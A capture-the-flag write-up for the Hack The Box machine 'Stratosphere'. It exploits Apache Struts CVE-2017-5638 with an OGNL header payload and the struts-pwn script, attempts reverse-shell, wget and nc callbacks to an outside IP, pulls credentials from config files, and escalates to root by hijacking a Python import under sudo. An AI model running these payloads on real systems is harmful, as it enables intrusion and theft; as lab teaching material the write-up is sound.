Skip to content

Latest commit

 

History

History
182 lines (138 loc) · 5.97 KB

write-up-stratosphere.md

File metadata and controls

182 lines (138 loc) · 5.97 KB
Raw

Stratosphere

This is the write-up for the box Stratosphere that got retired at the 1st September 2018. My IP address was 10.10.14.34 while I did this.

Let's put this in our hosts file:

10.10.10.64    stratosphere.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -o nmap/stratosphere.nmap 10.10.10.64
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Checking HTTP (Port 80)

The web page is a company website with nothing interesting on it and in the HTML source. Lets search for hidden directories with Gobuster:

gobuster -u http://10.10.10.64 dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It finds the following directories:

  • /manager
    • Login prompt for Tomcat Manager Application
  • /Monitoring
    • Forwards to /Monitoring/example/Welcome.action and there is a button to "Sign On" or "Register".

Monitoring page

The button Register forwards to /Monitoring/example/Register.action but there is only on sentence that it is under construction. The button Sign On forwards to /Monitoring/example/Login_input.action where it is possible to input an username and a password.

Sign on page

This .action extension is mostly used in Apache Struts and are used to determine how to process requests.

Enumerating and exploiting Apache Struts

In an article from Qualys they describe what kind of request to send to the server to see if it is vulnerable.

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Qualys-Struts',3195*5088)}.multipart/form-data

If we send this, the box will execute the math and response with the result of it in the header:

# Request
GET /Monitoring/example/Welcome.action HTTP/1.1
Host: 10.10.10.64
(...)
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Test',**3195*5088**)}.multipart/form-data

# Response
HTTP/1.1 200
**Test: 16256160**
Content-Type: text/html;charset=UTF-8

It seems like the box is vulnerable and as stated in the article, lets see if we can use CVE-2017-5638. There is an exploit script called struts-pwn on Github:

python3 struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c id

This executes the id command and displays the output, which means we have command execution:

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

Testing network connection and trying to start a reverse shell:

python3 struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"

python3 struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "wget http://10.10.14.34/"

python3 struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "nc -u 10.10.14.34 53"

Every connection get closed immediately, so there is probably a firewall in the way. In this case I will use a script to connect to the box with a web shell via HTTP request without callbacks to my local client. The script can be found in this repository.

python3 stratosphere_webshell.py

This will use the exploit from struts-pwn and start a shell session as the user tomcat8.

Privilege Escalation

As we are in the /var/lib/tomcat8 directory we can search for passwords in the configuration files. In /var/lib/tomcat8/db_connect there are two credentials:

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]       
user=admin
pass=admin

As the file is called db_connect lets use the credentials on MySQL:

mysql -h localhost -u ssn_admin -p

mysql -h localhost -u admin -p

Both credentials work but ssn_admin does not have access to any interesting databases while admin has:

show databases;
use users;
show tables;
select * from accounts;
+------------------+---------------------------+----------+
| fullName         | password                  | username |
+------------------+---------------------------+----------+
| Richard F. Smith | 9tc*rhKuG5TyXvUJOrE^5CK7k | richard  |
+------------------+---------------------------+----------+

In the /etc/passwd there is a richard user, so we can SSH into the server:

ssh richard@10.10.10.64

Privilege Escalation to root

The home directory of richard has a Python script named test.py of which root is the owner of and can write to it:

-rwxr-x--- 1 root    richard 1507 Mar 19  2018 test.py

The script looks like a hash cracking challenge with different hash types to crack and when successful, execute /root/success.py which we don't know what it does. The hash types are in this order to crack:

MD5, SHA1, MD4, BLAKE512

As the hash type BLAKE512 is secure and a very long string, cracking it will take way too long. This challenge is not meant to be done this way.

When looking at the sudo privileges of richard, it shows that he can run this script as sudo:

sudo -l

# Output
User richard may run the following commands on stratosphere:
    (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

The script loads one module in the beginning:

import hashlib

(...)

By loading this module from the current working directory and running the script with sudo privileges, we can abuse this script to run any command as root.

Creating hashlib.py in /home/richard with the following contents to execute bash:

import os

os.system("/bin/bash")

Running test.py with sudo:

sudo python /home/richard/test.py

Now it loads hashlib.py from the current directory, runs the code and starts a shell as root!